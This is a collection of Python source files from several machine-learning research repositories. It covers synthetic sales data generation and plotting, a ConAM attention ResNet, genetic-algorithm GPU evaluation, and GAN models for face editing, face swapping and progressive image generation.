9: [1.0, 1.0, 1.0, 1.1, 1.3, 1.5, 1.7, 1.9, 1.7, 1.3, 1.0, 1.0], # Watermelon
10: [1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.1, 1.2, 1.3, 1.4], # Soup vegetables
}
# impact of seasonality on outcome article volume (value between 0.0 and 2.0)
articleWeight = {
1: 1.0,
2: 0.0,
3: 0.6,
4: 0.4,
5: 0.5,
6: 1.5,
7: 0.5,
8: 0.7,
9: 0.7,
10: 0.8,
}
```
#### File: DataProcessing/DataGenerators/GeneratorStockarticles.py
```python
import pandas as pd
import random
from matplotlib import pyplot as plt
import DataProcessing.DataGenerators.Configuration.Season as seas
def generateStockArticles(hasToBeGenerated=False):
'''
:param hasToBeGenerated: (bool)
true: articles data gets freshly generated, default false: use generated .json
:return: stock: (pandas.dataframe)
dataframe with generated stockarticles
'''
random.seed(42)
if hasToBeGenerated:
# get article list
path = '../Datasets/Articles/articles.csv'
articles = pd.read_csv(path, header=[0])
# obtain total number of articles
# articleCount = sum(1 for row in articles)
print("fetching date information and creating possible production dates")
# get current date
# todayInit = date.today()
# today = todayInit.strftime("%y-%m-%d")
# possible production date options
# dates = pd.date_range(start=sept 2020, end=okt 2021)
dates = pd.date_range(start="2016-01-01", end="2021-09-30").date
print()
print("creating new dataframe")
# set dataframe columns
columns = ['articleID', 'productionDate', 'Quantity']
stock = pd.DataFrame(columns=columns)
print("creating data")
# writing data frame
for i in range(1000):
#generating attributes
articleId = int(articles.iloc[random.randint(0, articles.shape[0]-1)]["ID"])
productionDate = dates[random.randint(0, len(dates) - 1)]
# execute seasonality determination
randomQuantity = random.randint(5, 20)
seasonweight = seas.getSeason(productionDate, articleId)
quantity = int(randomQuantity + randomQuantity * seasonweight)
#creating rows
stock.loc[i] = [articleId,productionDate, quantity]
print("Sorting entries")
# sort values by articleId -> Date
stock = stock.sort_values(["productionDate", "articleID"]).reset_index(drop=True)
stock.plot('productionDate', y='Quantity')
plt.show()
stock.to_csv('../Datasets/Stockarticles/stockarticles.csv', index_label='ID')
else:
stock = pd.read_csv('../Datasets/Stockarticles/stockarticles.csv', index_col=False)
return stock
if __name__ == '__main__':
generateStockArticles(False)
```
#### File: IndAna/ResultsVisualisation/ResultsVisualisation.py
```python
from matplotlib import pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
from setuptools.msvc import winreg
import MachineLearning.LinearRegression.LinearRegression as lr
import MachineLearning.LinearRegression.PolynomialRegression as plr
def linearRegressionVisualisation(articleId):
'''
Plots the sales data and predictions of the linear regression machine learning model for a article in a 2d plot
:param articleId: (int)
identifier for a article
'''
sales, realSales, predictions, articleName = lr.linearRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 10)))
plt.scatter(dates, realSales, s=10, label="Verkaufsmenge am Tag")
plt.plot(dates, predictions, color='red', label='Vorhersage')
plt.gcf().autofmt_xdate()
plt.title("Verkaufsverlauf für das Produkt {}".format(articleName))
plt.xlabel("Datum")
plt.ylabel("Verkaufsmenge")
plt.legend(loc="best")
plt.show()
def linearRegression3dVisualisation(articleId):
'''
Plots the sales data and predictions of the linear regression machine learning model for a article in a 3d plot
:param articleId: (int)
identifier for a article
'''
sales, realSales, predictions, articleName = lr.linearRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
ax = plt.axes(projection='3d')
ax.set_xlabel('Date')
ax.set_ylabel('Average Temperature')
ax.set_zlabel('Sales')
xAxis = range(len(sales['date']))
# Data for a three-dimensional line
ax.plot3D(xAxis, sales['tavg'], predictions, 'red')
# Data for three-dimensional scattered points
ax.scatter3D(xAxis, sales['tavg'], realSales, alpha=0.3, facecolors='none', edgecolors='blue')
ax.xaxis.set_ticks(xAxis)
ax.xaxis.set_ticklabels(dates)
plt.title("Sales history for the article {}".format(articleName))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 5)))
plt.show()
def polynomialRegressionVisualisation(articleId):
'''
Plots the sales data and predictions of the polynomial regression machine learning model for a article in a 2d plot
:param articleId: (int)
identifier for a article
'''
sales, realSales, predictions, articleName = plr.polynomialRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates)/10)))
plt.scatter(dates, realSales, s=10, label="Verkaufsmenge am Tag")
plt.plot(dates, predictions, color='red', label='Vorhersage')
plt.gcf().autofmt_xdate()
plt.title("Verkaufsverlauf für das Produkt {}".format(articleName))
plt.xlabel("Datum")
plt.ylabel("Verkaufsmenge")
plt.legend(loc="best")
plt.show()
def polynomialRegression3dVisualisation(articleId):
'''
Plots the sales data and predictions of the polynomial regression machine learning model for a article in a 3d plot
:param articleId: (int)
identifier for a article
'''
sales, realSales, predictions, articleName = plr.polynomialRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
ax = plt.axes(projection='3d')
ax.set_xlabel('Date')
ax.set_ylabel('Average Temperature')
ax.set_zlabel('Sales')
xAxis = range(len(sales['date']))
# Data for a three-dimensional line
ax.plot3D(xAxis, sales['tavg'], predictions, 'red')
# Data for three-dimensional scattered points
ax.scatter3D(xAxis, sales['tavg'], realSales, alpha=0.3, facecolors='none', edgecolors='blue')
ax.xaxis.set_ticks(xAxis)
ax.xaxis.set_ticklabels(dates)
plt.title("Sales history for the article {}".format(articleName))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 5)))
plt.show()
def SARIMAXVisualisation(articleId):
'''
Plots the sales data and predictions of the SARIMAX machine learning model for a article in a 2d plot
:param articleId: (int)
identifier for a article
'''
pass
def RNNVisualisation(articleId):
'''
Plots the sales data and predictions of the RNN machine learning model for a article in a 2d plot
:param articleId: (int)
identifier for a article
'''
pass
if __name__ == '__main__':
# Change for different articles
wishedArticleId = 1
linearRegression3dVisualisation(wishedArticleId)
polynomialRegression3dVisualisation(wishedArticleId)
``` |
{
"source": "1ZimingYuan/ConAM",
"score": 2
} |
#### File: ConAM/models/ConAM.py
```python
from torch import Tensor
import torch
from einops import rearrange, reduce
def conam(self, input: Tensor) -> Tensor:
global_feature = reduce(input, 'b c h w -> b c', reduction='mean')
global_feature = rearrange(global_feature, 'b c -> b 1 c ')
local_feature = rearrange(input, 'b c (h h1) (w w1) -> b c h w h1 w1', h1=self.patch_size, w1=self.patch_size)
input_ = local_feature
local_feature = reduce(local_feature, 'b c h w h1 w1 -> b c h w', reduction='mean')
h = local_feature.shape[2]
local_feature = rearrange(local_feature, 'b c h w -> b (h w) c')#( b p c)
mix_local_global = torch.cat([local_feature, global_feature], 1)#(b p+1 c)
mix_local_global = self.linear1(mix_local_global)
mix_local_global = self.relu(mix_local_global)
mix_local_global = self.linear2(mix_local_global)
mix_local_global = self.relu(mix_local_global)
local_feature, global_feature = torch.split(mix_local_global, [local_feature.shape[1], global_feature.shape[1]], 1)#(b p c), (b 1 c)
global_feature = rearrange(global_feature, 'b p c -> b c p')#(b c 1)
attention = torch.matmul(local_feature, global_feature)#(b p 1)
attention = reduce(attention, 'b p c -> b p', reduction='mean')# c=1
attention = self.softmax(attention)
attention = rearrange(attention, 'b (h w) -> b 1 h w', h=h) # c=1
attention = rearrange(attention, 'b c h w -> b c h w 1 1')
input_ = input_ * attention
input_ = rearrange(input_, 'b c h w h1 w1 -> b c (h h1) (w w1)')
input = input + input_ #shortcut
return input
def forward(self, x: Tensor) -> Tensor:
return self.Attention(x)
```
#### File: ConAM/models/resnet50.py
```python
import torch.nn as nn
from torch import Tensor
import torch
from typing import List, Optional, Type, Union, Callable, Any
import sys
sys.path.append('/data/zmyuan/ResNet50-10')
from ConAM import conam
def conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv2d:
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv2d:
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(
self,
inplanes: int,
planes: int,
patch_size: int = 0,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
self.patch_size = patch_size
if patch_size != 0:
self.attention = conam(patch_size=patch_size, inchannel=inplanes)
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
def forward(self, x: Tensor) -> Tensor:
identity = x
if self.patch_size != 0:
x = self.attention(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(identity)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion: int = 4
def __init__(
self,
inplanes: int,
planes: int,
patch_size: int = 0,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
self.patch_size = patch_size
if patch_size != 0:
self.attention = conam(patch_size=patch_size, inchannel=inplanes)
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
if self.patch_size != 0:
x = self.attention(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(identity)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(
self,
block: Type[Union[Bottleneck, BasicBlock]],
layers: List[int],
patch_sizes: List[int],
num_classes: int = 10,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 64, layers[0], patch_sizes[0])
self.layer2 = self._make_layer(block, 128, layers[1], patch_sizes[1], stride=2,)
self.layer3 = self._make_layer(block, 256, layers[2], patch_sizes[2], stride=2,)
self.layer4 = self._make_layer(block, 512, layers[3], patch_sizes[3], stride=2,)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]
else:
raise ValueError('not Bottleneck')
def _make_layer(self, block: Type[Union[Bottleneck, BasicBlock]], planes: int, blocks: int, patch_size: int,
stride: int = 1,) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, patch_size, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
layer = [3, 4, 6, 3]
patch_size = [8, 8, 4, 0] # the patch_size can be [8, 8, 4, 0], [8, 4, 2, 0], etc..
return ResNet(Bottleneck, layer, patch_size)
``` |
{
"source": "1ZimingYuan/Sleep",
"score": 3
} |
#### File: Sleep/Genetic_Algorithm/Evaluation.py
```python
from utils import Utils, GPUTools
import importlib
from multiprocessing import Process
import time, os, sys
from asyncio.tasks import sleep
class FitnessEvaluate(object):
def __init__(self, individuals, log):
self.individuals = individuals
self.log = log
def generate_to_python_file(self):
self.log.info('Begin to generate python files')
for indi in self.individuals:
Utils.generate_pytorch_file(indi)
self.log.info('Finish the generation of python files')
def evaluate(self):
"""
load fitness from cache file
"""
self.log.info('Query fitness from cache')
_map = Utils.load_cache_data()
_count = 0
for indi in self.individuals:
_key, _str = indi.uuid()
if _key in _map:
_count += 1
_acc = _map[_key]
self.log.info('Hit the cache for %s, key:%s, acc:%.5f, assigned_acc:%.5f'%(indi.id, _key, float(_acc), indi.acc))
indi.acc = float(_acc)
self.log.info('Total hit %d individuals for fitness'%(_count))
has_evaluated_offspring = False
for indi in self.individuals:
temp=1
if indi.acc < 0:
has_evaluated_offspring = True
time.sleep(60)
gpu_id = GPUTools.detect_availabel_gpu_id()
while gpu_id is None:
time.sleep(300)
if temp==1:
self.log.info('Waiting for free GPU...')
temp=2
gpu_id = GPUTools.detect_availabel_gpu_id()
if gpu_id is not None:
file_name = indi.id
self.log.info('Begin to train %s'%(file_name))
module_name = 'scripts.%s'%(file_name)
if module_name in sys.modules.keys():
self.log.info('Module:%s has been loaded, delete it'%(module_name))
del sys.modules[module_name]
_module = importlib.import_module('.', module_name)
else:
_module = importlib.import_module('.', module_name)
_class = getattr(_module, 'RunModel')
cls_obj = _class()
p=Process(target=cls_obj.do_work, args=('%d'%(gpu_id), file_name,))
p.start()
else:
file_name = indi.id
self.log.info('%s has inherited the fitness as %.5f, no need to evaluate'%(file_name, indi.acc))
f = open('./populations/after_%s.txt'%(file_name[4:6]), 'a+')
f.write('%s=%.5f\n'%(file_name, indi.acc))
f.flush()
f.close()
if has_evaluated_offspring:
all_finished = False
while all_finished is not True:
time.sleep(300)
all_finished = GPUTools.all_gpu_available()
if has_evaluated_offspring:
file_name = './populations/after_%s.txt'%(self.individuals[0].id[4:6])
assert os.path.exists(file_name) == True
f = open(file_name, 'r')
fitness_map = {}
for line in f:
if len(line.strip()) > 0:
line = line.strip().split('=')
fitness_map[line[0]] = float(line[1])
f.close()
for indi in self.individuals:
if indi.acc == -1:
if indi.id not in fitness_map:
self.log.warn('The individuals have been evaluated, but the records are not correct, the fitness of %s does not exist in %s, wait 120 seconds'%(indi.id, file_name))
sleep(120)
indi.acc = fitness_map[indi.id]
else:
self.log.info('None offspring has been evaluated')
Utils.save_fitness_to_cache(self.individuals)
``` |
{
"source": "1zong2/INVZ-encoder4editing",
"score": 2
} |
#### File: INVZ-encoder4editing/encoder4editing/model.py
```python
import torch
from lib import utils
from lib.model_interface import ModelInterface
from encoder4editing.loss import Encoder4EditingLoss
from encoder4editing.nets import Encoder4EditingGenerator
from submodel.discriminator import LatentCodesDiscriminator # with BCE
class Encoder4Editing(ModelInterface):
def initialize_models(self):
self.G = Encoder4EditingGenerator(arcface_path=self.args.arcface_path, batch_per_gpu=self.args.batch_per_gpu, stylegan_path=self.args.stylegan_path, stylegan_size=self.args.stylegan_size).cuda(self.gpu).train()
self.D = LatentCodesDiscriminator().cuda(self.gpu).train()
def set_loss_collector(self):
self._loss_collector = Encoder4EditingLoss(self.args)
def train_step(self, global_step):
# load batch
I_source = self.load_next_batch()
self.dict = {
"I_source": I_source,
}
# run G
self.run_G()
# update G
loss_G = self.loss_collector.get_loss_G(self.dict)
utils.update_net(self.opt_G, loss_G)
# run D
self.run_D()
# update D
loss_D = self.loss_collector.get_loss_D(self.dict)
utils.update_net(self.opt_D, loss_D)
return [self.dict["I_source"], self.dict["I_recon"]]
def run_G(self):
I_recon, w_fake = self.G(self.dict["I_source"])
d_adv = self.D(w_fake)
id_source = self.G.get_id(self.dict["I_source"])
id_recon = self.G.get_id(I_recon)
self.dict["I_recon"] = I_recon
self.dict["w_fake"] = w_fake
self.dict["d_adv"] = d_adv
self.dict["id_source"] = id_source
self.dict["id_recon"] = id_recon
def run_D(self):
self.dict["w_real"] = self.G.get_w_from_random_z()
self.dict["w_real"].requires_grad_()
d_real = self.D(self.dict["w_real"])
d_fake = self.D(self.dict["w_fake"].detach())
self.dict["d_real"] = d_real # [8, 16, 1]
self.dict["d_fake"] = d_fake
def validation(self, step):
with torch.no_grad():
Y = self.G(self.valid_source)[0]
utils.save_image(self.args, step, "valid_imgs", [self.valid_source, Y])
def save_image(self, result, step):
utils.save_image(self.args, step, "imgs", result)
@property
def loss_collector(self):
return self._loss_collector
``` |
{
"source": "1zong2/INVZ-hififace",
"score": 2
} |
#### File: INVZ-hififace/hififace/loss.py
```python
import torch
from lib.loss import Loss, LossInterface
class HifiFaceLoss(LossInterface):
def __init__(self, args):
super().__init__(args)
self.face_pool = torch.nn.AdaptiveAvgPool2d((64, 64)).to("cuda").eval()
def get_loss_G(self, G_dict):
L_G = 0.0
# Adversarial loss
if self.args.W_adv:
L_adv = Loss.get_BCE_loss(G_dict["d_adv"], True)
L_G += self.args.W_adv * L_adv
self.loss_dict["L_adv"] = round(L_adv.item(), 4)
# Shape loss
if self.args.W_shape:
L_shape = Loss.get_L1_loss(G_dict["q_fuse"], G_dict["q_swapped_high"])
L_shape += Loss.get_L1_loss(G_dict["q_fuse"], G_dict["q_swapped_low"])
L_G += self.args.W_shape * L_shape/68
self.loss_dict["L_shape"] = round(L_shape.item(), 4)
# Id loss
if self.args.W_id:
L_id = Loss.get_id_loss(G_dict["id_source"], G_dict["id_swapped_high"])
L_id += Loss.get_id_loss(G_dict["id_source"], G_dict["id_swapped_low"])
L_G += self.args.W_id * L_id
self.loss_dict["L_id"] = round(L_id.item(), 4)
# Reconstruction loss
if self.args.W_recon:
L_recon = Loss.get_L1_loss_with_same_person(G_dict["I_swapped_high"], G_dict["I_target"], G_dict["same_person"], self.args.batch_per_gpu)
L_recon += Loss.get_L1_loss_with_same_person(G_dict["I_swapped_low"], G_dict["I_target"], G_dict["same_person"], self.args.batch_per_gpu)
L_G += self.args.W_recon * L_recon
self.loss_dict["L_recon"] = round(L_recon.item(), 4)
# Cycle loss
if self.args.W_cycle:
L_cycle = Loss.get_L1_loss(G_dict["I_target"], G_dict["I_cycle"])
L_G += self.args.W_cycle * L_cycle
self.loss_dict["L_cycle"] = round(L_cycle.item(), 4)
# LPIPS loss
if self.args.W_lpips:
# L_lpips = Loss.get_lpips_loss(G_dict["I_cycle"], G_dict["I_target"])
L_lpips = Loss.get_lpips_loss(G_dict["I_swapped_high"], G_dict["I_target"])
L_lpips += Loss.get_lpips_loss(G_dict["I_swapped_low"], G_dict["I_target"])
L_G += self.args.W_lpips * L_lpips
self.loss_dict["L_lpips"] = round(L_lpips.item(), 4)
self.loss_dict["L_G"] = round(L_G.item(), 4)
return L_G
def get_loss_D(self, D_dict):
L_true = Loss.get_BCE_loss(D_dict["d_true"], True)
L_fake = Loss.get_BCE_loss(D_dict["d_fake"], False)
L_reg = Loss.get_r1_reg(D_dict["d_true"], D_dict["I_target"])
L_D = L_true + L_fake + L_reg
self.loss_dict["L_D"] = round(L_D.item(), 4)
self.loss_dict["L_true"] = round(L_true.mean().item(), 4)
self.loss_dict["L_fake"] = round(L_fake.mean().item(), 4)
return L_D
``` |
{
"source": "1zong2/pggan",
"score": 2
} |
#### File: pggan/pggan/loss.py
```python
import torch
from lib.loss import Loss, LossInterface
class WGANGPLoss(LossInterface):
def get_loss_G(self, G_dict):
L_G = 0.0
# Adversarial loss
if self.args.W_adv:
L_adv = Loss.get_BCE_loss(G_dict["pred_fake"], True)
L_G += self.args.W_adv * L_adv
self.loss_dict["L_G"] = round(L_G.item(), 4)
return L_G
def get_loss_D(self, D_dict):
# Real
L_D_real = Loss.get_BCE_loss(D_dict["pred_real"], True)
L_D_fake = Loss.get_BCE_loss(D_dict["pred_fake"], False)
L_reg = Loss.get_r1_reg(L_D_real, D_dict["img_real"])
L_D = L_D_real + L_D_fake + L_reg
self.loss_dict["L_D_real"] = round(L_D_real.mean().item(), 4)
self.loss_dict["L_D_fake"] = round(L_D_fake.mean().item(), 4)
self.loss_dict["L_D"] = round(L_D.item(), 4)
return L_D
# def get_loss_D(self, D_dict, discriminator):
# """
# WGANGP 는 Discriminator 를 두 번 update 합니다.
# (get_gradient_penalty 에서 한 번, L_D 를 이용해 model.D 를 업데이트 할 때 한 번)
# """
# L_D_real = Loss.get_BCE_loss(D_dict["pred_real"], True)
# L_D_fake = Loss.get_BCE_loss(D_dict["pred_fake"], False)
# L_D = L_D_real + L_D_fake
# # WGAN-GP gradient loss
# L_D_gp = self.get_gradient_penalty(D_dict, discriminator)
# # Drift loss (the fourth term)
# L_D_eps = self.get_drift_loss(D_dict)
# self.loss_dict["L_D_real"] = round(L_D_real.mean().item(), 4)
# self.loss_dict["L_D_fake"] = round(L_D_fake.mean().item(), 4)
# self.loss_dict["L_D_gp"] = round(L_D_gp, 4)
# self.loss_dict["L_D_eps"] = round(L_D_eps, 4)
# self.loss_dict["L_D"] = round(L_D.item() + L_D_gp + L_D_eps, 4)
# return L_D
def get_gradient_penalty(self, D_dict, discriminator, backward=True):
r"""
Gradient penalty as described in
"Improved Training of Wasserstein GANs"
https://arxiv.org/pdf/1704.00028.pdf
Args:
- input (Tensor): batch of real data
- fake (Tensor): batch of generated data. Must have the same size
as the input
- discrimator (nn.Module): discriminator network
- weight (float): weight to apply to the penalty term
- backward (bool): loss backpropagation
"""
if self.args.W_gp:
batchSize = D_dict["img_real"].size(0)
eps = torch.rand(batchSize, 1)
eps = eps.expand(batchSize, int(D_dict["img_real"].nelement()/batchSize)).contiguous().view(D_dict["img_real"].size())
eps = eps.to(D_dict["img_real"].get_device())
interpolates = eps * D_dict["img_real"] + ((1 - eps) * D_dict["img_fake"])
torch.autograd.Variable(interpolates, requires_grad=True)
decisionInterpolate = discriminator(interpolates)
decisionInterpolate = decisionInterpolate[:, 0].sum()
gradients = torch.autograd.grad(outputs=decisionInterpolate,
inputs=interpolates,
create_graph=True, retain_graph=True)
gradients = gradients[0].view(batchSize, -1)
gradients = (gradients * gradients).sum(dim=1).sqrt()
gradient_penalty = (((gradients - 1.0)**2)).sum() * self.args.W_gp
if backward:
gradient_penalty.backward(retain_graph=True)
return gradient_penalty.item()
def get_drift_loss(self, D_dict):
"""
Loss for keeping D output from drifting too far away from 0
"""
if self.args.W_drift_D:
drift = (D_dict["pred_real"] ** 2).sum() * self.args.W_drift_D
return drift.item()
```
#### File: pggan/pggan/model.py
```python
import torch
import torch.nn.functional as F
from lib import checkpoint, utils
from lib.model import ModelInterface
from lib.dataset import UnsupervisedDataset
from pggan.nets import Generator, Discriminator
from pggan.loss import WGANGPLoss
class ProgressiveGAN(ModelInterface):
def __init__(self, args, gpu):
self.scale_index = 0
self.downsample = torch.nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)
super().__init__(args, gpu)
def initialize_models(self):
self.initialize_generator()
self.initialize_discriminator()
self.G.train()
self.D.train()
def initialize_generator(self):
self.G = Generator(self.args.latent_dim,
self.args.depths[0],
self.args.init_bias_to_zero,
self.args.LReLU_slope,
self.args.apply_pixel_norm,
self.args.generator_last_activation,
self.args.output_dim,
self.args.equalized_lr)
self.G.cuda(self.gpu)
def initialize_discriminator(self):
self.D = Discriminator(self.args.depths[0],
self.args.init_bias_to_zero,
self.args.LReLU_slope,
self.args.decision_layer_size,
self.args.apply_minibatch_norm,
self.args.input_dim, # input_dim output_dim
self.args.equalized_lr)
self.D.cuda(self.gpu)
# Override
def save_checkpoint(self, global_step):
"""
Save model and optimizer parameters.
"""
ckpt_dict = {
"args": self.args.__dict__,
"global_step": global_step,
"alpha_G": self.G.alpha,
"alpha_D": self.D.alpha,
"alpha_index": self.alpha_index,
"alpha_jump_value": self.alpha_jump_value,
"next_alpha_jump_step": self.next_alpha_jump_step,
"scale_index": self.scale_index,
"next_scale_jump_step": self.next_scale_jump_step,
}
checkpoint.save_checkpoint(self.G, self.opt_G, name='G', ckpt_dict=ckpt_dict)
checkpoint.save_checkpoint(self.D, self.opt_D, name='D', ckpt_dict=ckpt_dict)
# Override
def load_checkpoint(self):
"""
Load pretrained parameters from checkpoint to the initialized models.
"""
G_ckpt_dict, D_ckpt_dict = \
checkpoint.load_checkpoint(self.args, name='G'), \
checkpoint.load_checkpoint(self.args, name='D')
self.args.update(G_ckpt_dict["args"])
self.global_step = G_ckpt_dict["global_step"]
self.G.alpha = G_ckpt_dict["alpha_G"]
self.D.alpha = G_ckpt_dict["alpha_D"]
self.alpha_index = G_ckpt_dict["alpha_index"]
self.alpha_jump_value = G_ckpt_dict["alpha_jump_value"]
self.next_alpha_jump_step = G_ckpt_dict["next_alpha_jump_step"]
self.scale_index = G_ckpt_dict["scale_index"]
self.next_scale_jump_step = G_ckpt_dict["next_scale_jump_step"]
for index in range(self.scale_index):
self.G.add_block(self.args.depths[index])
self.D.add_block(self.args.depths[index])
self.G.cuda()
self.D.cuda()
self.reset_solver()
self.G.load_state_dict(G_ckpt_dict['model'], strict=False)
self.opt_G.load_state_dict(G_ckpt_dict['optimizer'])
self.D.load_state_dict(D_ckpt_dict['model'], strict=False)
self.opt_D.load_state_dict(D_ckpt_dict['optimizer'])
# Override
def load_next_batch(self):
"""
Load next batch of source image, target image, and boolean values that denote
if source and target are identical.
"""
try:
batch = next(self.train_iterator)
except StopIteration:
self.train_iterator = iter(self.train_dataloader)
batch = next(self.train_iterator)
batch = batch.to(self.gpu)
return batch
# Override
def set_dataset(self):
"""
Initialize dataset using the dataset paths specified in the command line arguments.
CelebA: 202,599 face images of the size 178×218 from 10,177 celebrities
"""
dataset = UnsupervisedDataset(self.args.dataset_root_list, self.scale_index, self.args.isMaster)
N = len(dataset)
N_train = round(N * 0.7)
self.train_dataset, self.valid_dataset = torch.utils.data.random_split(dataset, [N_train, N - N_train])
def set_loss_collector(self):
self._loss_collector = WGANGPLoss(self.args)
def reset_solver(self):
"""
Reset data loaders corresponding to the output image size,
and reset optimizers as the number of learnable parameters are changed.
This method is required only when the Generator and the Discriminator add a new block.
"""
self.set_dataset()
self.set_data_iterator()
self.set_optimizers()
def reset_alpha(self, global_step):
"""
Initialize alpha-related-variables
This method is required only when the Generator and the Discriminator add a new block.
"""
self.G.alpha = 0
self.D.alpha = 0
self.alpha_index = 0
self.next_alpha_jump_step = global_step + self.args.alpha_jump_start[self.scale_index]
self.alpha_jump_value = 1/self.args.alpha_jump_Ntimes[self.scale_index]
if self.args.isMaster:
print(f"alpha and alpha_index are initialized to 0")
print(f"next_alpha_jump_step is set to {self.next_alpha_jump_step}")
print(f"alpha_jump_value is set to {self.alpha_jump_value}")
def change_scale(self, global_step):
self.scale_index += 1
self.next_scale_jump_step += self.args.max_step_at_scale[self.scale_index]
# add a block to net G and net D
self.G.add_block(self.args.depths[self.scale_index])
self.D.add_block(self.args.depths[self.scale_index])
self.G.cuda()
self.D.cuda()
self.reset_solver()
self.reset_alpha(global_step)
if self.args.isMaster:
print(f"\nNOW global_step is {global_step}")
print(f"scale_index is updated to {self.scale_index}")
print(f"next_scale_jump_step is {self.next_scale_jump_step}")
def change_alpha(self, global_step):
self.alpha_index += 1
self.G.alpha += self.alpha_jump_value
self.D.alpha += self.alpha_jump_value
self.G.alpha = round(self.G.alpha, 4)
self.D.alpha = round(self.D.alpha, 4)
# check if alpha_index is reached to alpha_jump_Ntimes
if self.alpha_index == self.args.alpha_jump_Ntimes[self.scale_index]:
self.next_alpha_jump_step = 0
else:
self.next_alpha_jump_step = global_step + self.args.alpha_jump_interval[self.scale_index]
if self.args.isMaster:
print(f"\nNOW global_step is {global_step}")
print(f"alpha_index is updated to {self.alpha_index}")
print(f"next_alpha_jump_step is {self.next_alpha_jump_step}")
print(f"alpha is now {self.G.alpha}")
def check_jump(self, global_step):
# scale 이 바뀔 때
if self.next_scale_jump_step == global_step:
self.change_scale(global_step)
# alpha 가 바뀔 때 (Linear mode)
if self.next_alpha_jump_step == global_step:
self.change_alpha(global_step)
def train_step(self):
"""
